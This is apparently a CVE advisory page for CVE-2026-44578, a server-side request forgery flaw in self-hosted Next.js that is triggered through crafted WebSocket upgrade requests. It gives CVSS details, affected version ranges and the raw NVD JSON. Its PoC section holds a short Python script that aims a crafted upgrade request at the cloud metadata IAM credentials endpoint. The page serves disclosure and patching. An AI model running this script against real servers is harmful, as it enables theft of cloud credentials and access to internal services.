Security Vulnerability Report
CVE-2026-44578 CVSS 8.6 HIGH

CVE-2026-44578

Published: 2026-05-13 18:16:18
Last Modified: 2026-05-14 18:34:39

Description

Next.js is a React framework for building full-stack web applications. From 13.4.13 to before 15.5.16 and 16.2.5, self-hosted applications using the built-in Node.js server can be vulnerable to server-side request forgery through crafted WebSocket upgrade requests. An attacker can cause the server to proxy requests to arbitrary internal or external destinations, which may expose internal services or cloud metadata endpoints. Vercel-hosted deployments are not affected. This vulnerability is fixed in 15.5.16 and 16.2.5.

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:* - VULNERABLE
    13.4.13 <= version < 15.5.16
cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:* - VULNERABLE
    16.0.0 <= version < 16.2.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket

# Target vulnerable Next.js server
target_host = "vulnerable-nextjs-app.com"
target_port = 80

# Internal target to access (e.g., cloud metadata or internal admin panel)
# The vulnerability allows proxying requests to arbitrary destinations via WebSocket upgrade
internal_target = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

payload = (
    f"GET {internal_target} HTTP/1.1\r\n"
    f"Host: {target_host}\r\n"
    "Upgrade: websocket\r\n"
    "Connection: Upgrade\r\n"
    "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\r\n"
    "Sec-WebSocket-Version: 13\r\n"
    "\r\n"
)

print(f"Sending malicious WebSocket upgrade request to {target_host}...")

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((target_host, target_port))
    s.sendall(payload.encode())
    response = s.recv(4096)
    print("Response from internal target via SSRF:")
    # Tolerate non-UTF-8 bytes in the proxied response instead of raising
    print(response.decode(errors="replace"))

References

https://github.com/vercel/next.js/security/advisories/GHSA-c4j6-fc7j-m34r (Mitigation, Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-44578",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-13T18:16:17.990",
    "lastModified": "2026-05-14T18:34:38.530",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Next.js is a React framework for building full-stack web applications. From 13.4.13 to before 15.5.16 and 16.2.5, self-hosted applications using the built-in Node.js server can be vulnerable to server-side request forgery through crafted WebSocket upgrade requests. An attacker can cause the server to proxy requests to arbitrary internal or external destinations, which may expose internal services or cloud metadata endpoints. Vercel-hosted deployments are not affected. This vulnerability is fixed in 15.5.16 and 16.2.5."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
            "baseScore": 8.6,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 4.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-918"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*",
                "versionStartIncluding": "13.4.13",
                "versionEndExcluding": "15.5.16",
                "matchCriteriaId": "9845CDE5-B999-458E-9FCE-E1D0F63B8AC6"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*",
                "versionStartIncluding": "16.0.0",
                "versionEndExcluding": "16.2.5",
                "matchCriteriaId": "27C5CF7A-7A33-4BE4-B8FD-10BFD813204A"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/vercel/next.js/security/advisories/GHSA-c4j6-fc7j-m34r",
        "source": "[email protected]",
        "tags": ["Mitigation", "Vendor Advisory"]
      }
    ]
  }
}